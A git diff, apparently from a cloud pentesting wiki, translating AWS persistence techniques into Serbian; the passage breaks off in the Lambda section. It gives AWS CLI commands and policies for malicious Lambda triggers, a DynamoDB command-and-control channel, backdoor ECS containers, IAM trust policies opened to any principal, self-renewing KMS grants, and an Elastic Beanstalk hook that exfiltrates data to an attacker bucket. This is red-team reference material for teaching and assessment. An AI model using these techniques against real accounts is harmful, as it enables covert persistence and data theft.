 ../aws-services/aws-dynamodb-enum.md
 {{#endref}}
 
-### DynamoDB Triggers with Lambda Backdoor
-
-Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
+### DynamoDB Okidači sa Lambda Backdoor-om
 
+Korišćenjem DynamoDB okidača, napadač može kreirati **neprimetan backdoor** povezivanjem maliciozne Lambda funkcije sa tabelom. Lambda funkcija može biti okinuta kada se stavka doda, izmeni ili obriše, omogućavajući napadaču da izvrši proizvoljan kod unutar AWS naloga.
 ```bash
 # Create a malicious Lambda function
 aws lambda create-function \
-    --function-name MaliciousFunction \
-    --runtime nodejs14.x \
-    --role  \
-    --handler index.handler \
-    --zip-file fileb://malicious_function.zip \
-    --region 
+--function-name MaliciousFunction \
+--runtime nodejs14.x \
+--role  \
+--handler index.handler \
+--zip-file fileb://malicious_function.zip \
+--region 
 
 # Associate the Lambda function with the DynamoDB table as a trigger
 aws dynamodbstreams describe-stream \
-    --table-name TargetTable \
-    --region 
+--table-name TargetTable \
+--region 
 
 # Note the "StreamArn" from the output
 aws lambda create-event-source-mapping \
-    --function-name MaliciousFunction \
-    --event-source  \
-    --region 
+--function-name MaliciousFunction \
+--event-source  \
+--region 
 ```
+Da bi održao postojanost, napadač može da kreira ili menja stavke u DynamoDB tabeli, što će pokrenuti zlonamernu Lambda funkciju. Ovo omogućava napadaču da izvrši kod unutar AWS naloga bez direktne interakcije sa Lambda funkcijom.
 
-To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
-
-### DynamoDB as a C2 Channel
-
-An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
+### DynamoDB kao C2 kanal
 
+Napadač može koristiti DynamoDB tabelu kao **command and control (C2) kanal** kreiranjem stavki koje sadrže komande i korišćenjem kompromitovanih instanci ili Lambda funkcija za preuzimanje i izvršavanje ovih komandi.
 ```bash
 # Create a DynamoDB table for C2
 aws dynamodb create-table \
-    --table-name C2Table \
-    --attribute-definitions AttributeName=CommandId,AttributeType=S \
-    --key-schema AttributeName=CommandId,KeyType=HASH \
-    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
-    --region 
+--table-name C2Table \
+--attribute-definitions AttributeName=CommandId,AttributeType=S \
+--key-schema AttributeName=CommandId,KeyType=HASH \
+--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+--region 
 
 # Insert a command into the table
 aws dynamodb put-item \
-    --table-name C2Table \
-    --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
-    --region 
+--table-name C2Table \
+--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
+--region 
 ```
-
-The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
+Kompromitovane instance ili Lambda funkcije mogu povremeno proveravati C2 tabelu za nove komande, izvršavati ih i po želji izveštavati o rezultatima nazad u tabelu. Ovo omogućava napadaču da održi postojanost i kontrolu nad kompromitovanim resursima.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
index b52ac9e85..e32207ea0 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
@@ -4,55 +4,51 @@
 
 ## EC2
 
-For more information check:
+Za više informacija proverite:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
-### Security Group Connection Tracking Persistence
+### Praćenje veze sigurnosne grupe
 
-If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
+Ako odbrambeni sistem otkrije da je **EC2 instanca kompromitovana**, verovatno će pokušati da **izoluje** **mrežu** mašine. To može učiniti sa eksplicitnim **Deny NACL** (ali NACL-ovi utiču na celu podmrežu), ili **promenom sigurnosne grupe** koja ne dozvoljava **nikakav ulazni ili izlazni** saobraćaj.
 
-If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
+Ako je napadač imao **obrnuti shell koji potiče sa mašine**, čak i ako je SG izmenjen da ne dozvoljava ulazni ili izlazni saobraćaj, **veza neće biti prekinuta zbog** [**Praćenja veze sigurnosne grupe**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
 
-### EC2 Lifecycle Manager
+### EC2 Menadžer životnog ciklusa
 
-This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
-An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
+Ova usluga omogućava **zakazivanje** **kreiranja AMI-a i snimaka** i čak **deljenje sa drugim nalozima**.\
+Napadač bi mogao da konfiguriše **generisanje AMI-a ili snimaka** svih slika ili svih volumena **svake nedelje** i **podeli ih sa svojim nalogom**.
 
-### Scheduled Instances
+### Zakazane instance
 
-It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
+Moguće je zakazati instance da se pokreću dnevno, nedeljno ili čak mesečno. Napadač bi mogao da pokrene mašinu sa visokim privilegijama ili zanimljivim pristupom gde bi mogao da pristupi.
 
-### Spot Fleet Request
+### Spot Fleet Zahtev
 
-Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
+Spot instance su **jeftinije** od redovnih instanci. Napadač bi mogao da pokrene **mali spot fleet zahtev za 5 godina** (na primer), sa **automatskom IP** dodelom i **korisničkim podacima** koji šalju napadaču **kada spot instanca počne** i **IP adresu** i sa **IAM ulogom sa visokim privilegijama**.
 
-### Backdoor Instances
+### Instanca sa zadnjim ulazom
 
-An attacker could get access to the instances and backdoor them:
+Napadač bi mogao da dobije pristup instancama i da ih zadnji ulaz:
 
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
-- Backdooring the **User Data**
+- Koristeći tradicionalni **rootkit** na primer
+- Dodajući novu **javnu SSH ključ** (proverite [EC2 privesc opcije](../aws-privilege-escalation/aws-ec2-privesc.md))
+- Zadnjim ulazom u **Korisničke podatke**
 
-### **Backdoor Launch Configuration**
+### **Konfiguracija pokretanja sa zadnjim ulazom**
 
-- Backdoor the used AMI
-- Backdoor the User Data
-- Backdoor the Key Pair
+- Zadnji ulaz u korišćeni AMI
+- Zadnji ulaz u Korisničke podatke
+- Zadnji ulaz u Par ključeva
 
 ### VPN
 
-Create a VPN so the attacker will be able to connect directly through i to the VPC.
+Kreirajte VPN tako da napadač može direktno da se poveže kroz njega sa VPC-om.
 
 ### VPC Peering
 
-Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
+Kreirajte peering vezu između VPC-a žrtve i VPC-a napadača kako bi mogao da pristupi VPC-u žrtve.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
index 07928fbd4..949ab1743 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -4,98 +4,88 @@
 
 ## ECR
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-ecr-enum.md
 {{#endref}}
 
-### Hidden Docker Image with Malicious Code
+### Sakrivena Docker slika sa zloćudnim kodom
 
-An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
+Napadač bi mogao **da otpremi Docker sliku koja sadrži zloćudni kod** u ECR repozitorijum i koristi je za održavanje postojanosti u ciljanom AWS nalogu. Napadač bi zatim mogao da implementira zloćudnu sliku na razne usluge unutar naloga, kao što su Amazon ECS ili EKS, na diskretan način.
 
-### Repository Policy
-
-Add a policy to a single repository granting yourself (or everybody) access to a repository:
+### Politika repozitorijuma
 
+Dodajte politiku jednom repozitorijumu koja vam omogućava (ili svima) pristup repozitorijumu:
 ```bash
 aws ecr set-repository-policy \
-    --repository-name cluster-autoscaler \
-    --policy-text file:///tmp/my-policy.json
+--repository-name cluster-autoscaler \
+--policy-text file:///tmp/my-policy.json
 
 # With a .json such as
 
 {
-    "Version" : "2008-10-17",
-    "Statement" : [
-        {
-            "Sid" : "allow public pull",
-            "Effect" : "Allow",
-            "Principal" : "*",
-            "Action" : [
-                "ecr:BatchCheckLayerAvailability",
-                "ecr:BatchGetImage",
-                "ecr:GetDownloadUrlForLayer"
-            ]
-        }
-    ]
+"Version" : "2008-10-17",
+"Statement" : [
+{
+"Sid" : "allow public pull",
+"Effect" : "Allow",
+"Principal" : "*",
+"Action" : [
+"ecr:BatchCheckLayerAvailability",
+"ecr:BatchGetImage",
+"ecr:GetDownloadUrlForLayer"
+]
+}
+]
 }
 ```
-
 > [!WARNING]
-> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
+> Imajte na umu da ECR zahteva da korisnici imaju **dozvolu** da pozivaju **`ecr:GetAuthorizationToken`** API putem IAM politike **pre nego što se mogu autentifikovati** na registru i slati ili preuzimati slike iz bilo kog Amazon ECR repozitorijuma.
 
-### Registry Policy & Cross-account Replication
+### Politika registracije i replikacija između naloga
 
-It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
+Moguće je automatski replicirati registar u eksternom nalogu konfigurišući replikaciju između naloga, gde treba da **naznačite eksterni nalog** u kojem želite da replicirate registar.
 
 

 
-First, you need to give the external account access over the registry with a **registry policy** like:
-
+Prvo, treba da date eksternom nalogu pristup nad registrijem sa **politikom registracije** kao:
 ```bash
 aws ecr put-registry-policy --policy-text file://my-policy.json
 
 # With a .json like:
 
 {
-  "Sid": "asdasd",
-  "Effect": "Allow",
-  "Principal": {
-    "AWS": "arn:aws:iam::947247140022:root"
-  },
-  "Action": [
-    "ecr:CreateRepository",
-    "ecr:ReplicateImage"
-  ],
-  "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
+"Sid": "asdasd",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::947247140022:root"
+},
+"Action": [
+"ecr:CreateRepository",
+"ecr:ReplicateImage"
+],
+"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
 }
 ```
-
-Then apply the replication config:
-
+Zatim primenite konfiguraciju replikacije:
 ```bash
 aws ecr put-replication-configuration \
-     --replication-configuration file://replication-settings.json \
-     --region us-west-2
+--replication-configuration file://replication-settings.json \
+--region us-west-2
 
 # Having the .json a content such as:
 {
-	"rules": [{
-		"destinations": [{
-			"region": "destination_region",
-			"registryId": "destination_accountId"
-		}],
-		"repositoryFilters": [{
-			"filter": "repository_prefix_name",
-			"filterType": "PREFIX_MATCH"
-		}]
-	}]
+"rules": [{
+"destinations": [{
+"region": "destination_region",
+"registryId": "destination_accountId"
+}],
+"repositoryFilters": [{
+"filter": "repository_prefix_name",
+"filterType": "PREFIX_MATCH"
+}]
+}]
 }
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
index 988626c8f..9e5f1a4fe 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
@@ -4,29 +4,28 @@
 
 ## ECS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-ecs-enum.md
 {{#endref}}
 
-### Hidden Periodic ECS Task
+### Sakrivena Periodična ECS Zadatak
 
 > [!NOTE]
 > TODO: Test
 
-An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
-
+Napadač može kreirati sakriveni periodični ECS zadatak koristeći Amazon EventBridge da **zakazuje izvršenje zlonamernog zadatka periodično**. Ovaj zadatak može vršiti izviđanje, eksfiltrirati podatke ili održavati postojanost u AWS nalogu.
 ```bash
 # Create a malicious task definition
 aws ecs register-task-definition --family "malicious-task" --container-definitions '[
-  {
-    "name": "malicious-container",
-    "image": "malicious-image:latest",
-    "memory": 256,
-    "cpu": 10,
-    "essential": true
-  }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
 ]'
 
 # Create an Amazon EventBridge rule to trigger the task periodically
@@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate
 
 # Add a target to the rule to run the malicious ECS task
 aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
-  {
-    "Id": "malicious-ecs-task-target",
-    "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
-    "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
-    "EcsParameters": {
-      "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
-      "TaskCount": 1
-    }
-  }
+{
+"Id": "malicious-ecs-task-target",
+"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
+"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
+"EcsParameters": {
+"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
+"TaskCount": 1
+}
+}
 ]'
 ```
-
 ### Backdoor Container in Existing ECS Task Definition
 
 > [!NOTE]
 > TODO: Test
 
-An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
-
+Napadač može dodati **neprimetan backdoor kontejner** u postojeću ECS definiciju zadatka koji se pokreće zajedno sa legitimnim kontejnerima. Backdoor kontejner se može koristiti za postojanost i izvođenje zlonamernih aktivnosti.
 ```bash
 # Update the existing task definition to include the backdoor container
 aws ecs register-task-definition --family "existing-task" --container-definitions '[
-  {
-    "name": "legitimate-container",
-    "image": "legitimate-image:latest",
-    "memory": 256,
-    "cpu": 10,
-    "essential": true
-  },
-  {
-    "name": "backdoor-container",
-    "image": "malicious-image:latest",
-    "memory": 256,
-    "cpu": 10,
-    "essential": false
-  }
+{
+"name": "legitimate-container",
+"image": "legitimate-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+},
+{
+"name": "backdoor-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": false
+}
 ]'
 ```
-
-### Undocumented ECS Service
+### Nedokumentovana ECS Usluga
 
 > [!NOTE]
 > TODO: Test
 
-An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
-
+Napadač može kreirati **nedokumentovanu ECS uslugu** koja pokreće zloćudni zadatak. Postavljanjem željenog broja zadataka na minimum i onemogućavanjem logovanja, postaje teže administratorima da primete zloćudnu uslugu.
 ```bash
 # Create a malicious task definition
 aws ecs register-task-definition --family "malicious-task" --container-definitions '[
-  {
-    "name": "malicious-container",
-    "image": "malicious-image:latest",
-    "memory": 256,
-    "cpu": 10,
-    "essential": true
-  }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
 ]'
 
 # Create an undocumented ECS service with the malicious task definition
 aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
index bdb282d41..7ff1b45ac 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
@@ -4,22 +4,18 @@
 
 ## EFS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-efs-enum.md
 {{#endref}}
 
-### Modify Resource Policy / Security Groups
+### Izmenite Politiku Resursa / Sigurnosne Grupe
 
-Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
+Izmenom **politike resursa i/ili sigurnosnih grupa** možete pokušati da zadržite svoj pristup u fajl sistemu.
 
-### Create Access Point
+### Kreirajte Pristupnu Tačku
 
-You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
+Možete **kreirati pristupnu tačku** (sa root pristupom do `/`) koja je dostupna iz servisa gde ste implementirali **drugog persistenciju** da zadržite privilegovan pristup fajl sistemu.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
index c55e0e2ba..88844d798 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
@@ -4,31 +4,30 @@
 
 ## Elastic Beanstalk
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-elastic-beanstalk-enum.md
 {{#endref}}
 
-### Persistence in Instance
+### Održavanje u Instanci
 
-In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
+Da bi se održala postojanost unutar AWS naloga, neki **mehanizam postojanosti može biti uveden unutar instance** (cron job, ssh ključ...) tako da napadač može da pristupi i ukrade IAM ulogu **akreditiva iz metadata servisa**.
 
-### Backdoor in Version
+### Bekdor u Verziji
 
-An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
+Napadač bi mogao da ubaci bekdor u kod unutar S3 repozitorijuma tako da se uvek izvršava njegov bekdor i očekivani kod.
 
-### New backdoored version
+### Nova verzija sa bekdorom
 
-Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
+Umesto da menja kod na aktuelnoj verziji, napadač bi mogao da implementira novu verziju aplikacije sa bekdorom.
 
-### Abusing Custom Resource Lifecycle Hooks
+### Zloupotreba Prilagođenih Resursa Lifecycle Hooks
 
 > [!NOTE]
 > TODO: Test
 
-Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
-
+Elastic Beanstalk pruža lifecycle hooks koji vam omogućavaju da pokrenete prilagođene skripte tokom postavljanja i gašenja instance. Napadač bi mogao da **konfiguriše lifecycle hook da periodično izvršava skriptu koja exfiltrira podatke ili održava pristup AWS nalogu**.
 ```bash
 bashCopy code# Attacker creates a script that exfiltrates data and maintains access
 echo '#!/bin/bash
@@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo
 
 # Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
 echo 'Resources:
-  AWSEBAutoScalingGroup:
-    Metadata:
-      AWS::ElasticBeanstalk::Ext:
-        TriggerConfiguration:
-          triggers:
-            - name: stealthy-lifecycle-hook
-              events:
-                - "autoscaling:EC2_INSTANCE_LAUNCH"
-                - "autoscaling:EC2_INSTANCE_TERMINATE"
-              target:
-                ref: "AWS::ElasticBeanstalk::Environment"
-              arn:
-                Fn::GetAtt:
-                  - "AWS::ElasticBeanstalk::Environment"
-                  - "Arn"
-  stealthyLifecycleHook:
-    Type: AWS::AutoScaling::LifecycleHook
-    Properties:
-      AutoScalingGroupName:
-        Ref: AWSEBAutoScalingGroup
-      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
-      NotificationTargetARN:
-        Ref: stealthy-lifecycle-hook
-      RoleARN:
-        Fn::GetAtt:
-          - AWSEBAutoScalingGroup
-          - Arn' > stealthy_lifecycle_hook.yaml
+AWSEBAutoScalingGroup:
+Metadata:
+AWS::ElasticBeanstalk::Ext:
+TriggerConfiguration:
+triggers:
+- name: stealthy-lifecycle-hook
+events:
+- "autoscaling:EC2_INSTANCE_LAUNCH"
+- "autoscaling:EC2_INSTANCE_TERMINATE"
+target:
+ref: "AWS::ElasticBeanstalk::Environment"
+arn:
+Fn::GetAtt:
+- "AWS::ElasticBeanstalk::Environment"
+- "Arn"
+stealthyLifecycleHook:
+Type: AWS::AutoScaling::LifecycleHook
+Properties:
+AutoScalingGroupName:
+Ref: AWSEBAutoScalingGroup
+LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
+NotificationTargetARN:
+Ref: stealthy-lifecycle-hook
+RoleARN:
+Fn::GetAtt:
+- AWSEBAutoScalingGroup
+- Arn' > stealthy_lifecycle_hook.yaml
 
 # Attacker applies the new environment configuration
 aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
index e3e1944e7..d12ca7ca9 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
@@ -4,50 +4,44 @@
 
 ## IAM
 
-For more information access:
+Za više informacija pristupite:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
 {{#endref}}
 
-### Common IAM Persistence
+### Uobičajena IAM Persistencija
 
-- Create a user
-- Add a controlled user to a privileged group
-- Create access keys (of the new user or of all users)
-- Grant extra permissions to controlled users/groups (attached policies or inline policies)
-- Disable MFA / Add you own MFA device
-- Create a Role Chain Juggling situation (more on this below in STS persistence)
+- Kreirajte korisnika
+- Dodajte kontrolisanog korisnika u privilegovanu grupu
+- Kreirajte pristupne ključeve (novog korisnika ili svih korisnika)
+- Dodelite dodatne dozvole kontrolisanim korisnicima/grupama (priložene politike ili inline politike)
+- Onemogućite MFA / Dodajte svoj MFA uređaj
+- Kreirajte situaciju sa lancem uloga (više o ovome u nastavku u STS persistenciji)
 
-### Backdoor Role Trust Policies
-
-You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone):
+### Politike poverenja za backdoor uloge
 
+Možete napraviti backdoor u politiku poverenja kako biste mogli da je preuzmete za spoljašnji resurs koji kontrolišete (ili za sve):
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": ["*", "arn:aws:iam::123213123123:root"]
-      },
-      "Action": "sts:AssumeRole"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": ["*", "arn:aws:iam::123213123123:root"]
+},
+"Action": "sts:AssumeRole"
+}
+]
 }
 ```
-
 ### Backdoor Policy Version
 
-Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group.
+Dajte Administrator dozvole politici koja nije u njenoj poslednjoj verziji (poslednja verzija treba da izgleda legitimno), a zatim dodelite tu verziju politike kontrolisanom korisniku/grupi.
 
 ### Backdoor / Create Identity Provider
 
-If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them.
+Ako nalog već veruje u zajedničkog provajdera identiteta (kao što je Github), uslovi poverenja mogu biti pojačani kako bi napadač mogao da ih zloupotrebi.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
index 7aefbd410..75396f010 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
@@ -1,43 +1,37 @@
-# AWS - KMS Persistence
+# AWS - KMS Persistencija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## KMS
 
-For mor information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-kms-enum.md
 {{#endref}}
 
-### Grant acces via KMS policies
+### Dodeljivanje pristupa putem KMS politika
 
-An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
+Napadač može koristiti dozvolu **`kms:PutKeyPolicy`** da **dodeli pristup** ključa korisniku pod njegovom kontrolom ili čak eksternom nalogu. Pogledajte [**KMS Privesc stranicu**](../aws-privilege-escalation/aws-kms-privesc.md) za više informacija.
 
-### Eternal Grant
+### Večna Dodela
 
-Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key.
+Dodele su još jedan način da se principalu daju neka ovlašćenja nad specifičnim ključem. Moguće je dodeliti dodelu koja omogućava korisniku da kreira dodele. Štaviše, korisnik može imati nekoliko dodela (čak i identičnih) nad istim ključem.
 
-Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated.
-
-(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant)
+Stoga, moguće je da korisnik ima 10 dodela sa svim ovlašćenjima. Napadač bi trebao stalno pratiti ovo. A ako u nekom trenutku 1 dodela bude uklonjena, treba generisati još 10. 
 
+(Koristimo 10, a ne 2, da bismo mogli da detektujemo da je dodela uklonjena dok korisnik još uvek ima neku dodelu)
 ```bash
 # To generate grants, generate 10 like this one
 aws kms create-grant \
-    --key-id  \
-    --grantee-principal  \
-    --operations "CreateGrant" "Decrypt"
+--key-id  \
+--grantee-principal  \
+--operations "CreateGrant" "Decrypt"
 
 # To monitor grants
 aws kms list-grants --key-id 
 ```
-
 > [!NOTE]
-> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
+> Grant može dati dozvole samo iz ovoga: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
index 1390c2d55..5a68d0add 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
@@ -4,7 +4,7 @@
 
 ## Lambda
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../../aws-services/aws-lambda-enum.md
@@ -12,7 +12,7 @@ For more information check:
 
 ### Lambda Layer Persistence
 
-It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
+Moguće je **uvesti/otvoriti backdoor u layer da izvrši proizvoljan kod** kada se lambda izvršava na diskretan način:
 
 {{#ref}}
 aws-lambda-layers-persistence.md
@@ -20,49 +20,45 @@ aws-lambda-layers-persistence.md
 
 ### Lambda Extension Persistence
 
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+Zloupotrebom Lambda Layers takođe je moguće zloupotrebiti ekstenzije i persistirati u lambdi, ali i ukrasti i izmeniti zahteve.
 
 {{#ref}}
 aws-abusing-lambda-extensions.md
 {{#endref}}
 
-### Via resource policies
+### Putem politika resursa
 
-It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
+Moguće je dodeliti pristup različitim lambda akcijama (kao što su pozivanje ili ažuriranje koda) spoljnim nalozima:
 
 

 
-### Versions, Aliases & Weights
+### Verzije, Alias-i & Težine
 
-A Lambda can have **different versions** (with different code each version).\
-Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
-This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
+Lambda može imati **različite verzije** (sa različitim kodom za svaku verziju).\
+Zatim, možete kreirati **različite alias-e sa različitim verzijama** lambde i postaviti različite težine za svaku.\
+Na ovaj način napadač bi mogao kreirati **backdoored verziju 1** i **verziju 2 sa samo legitimnim kodom** i **izvršavati verziju 1 u 1%** zahteva da ostane diskretan.
 
 

 
-### Version Backdoor + API Gateway
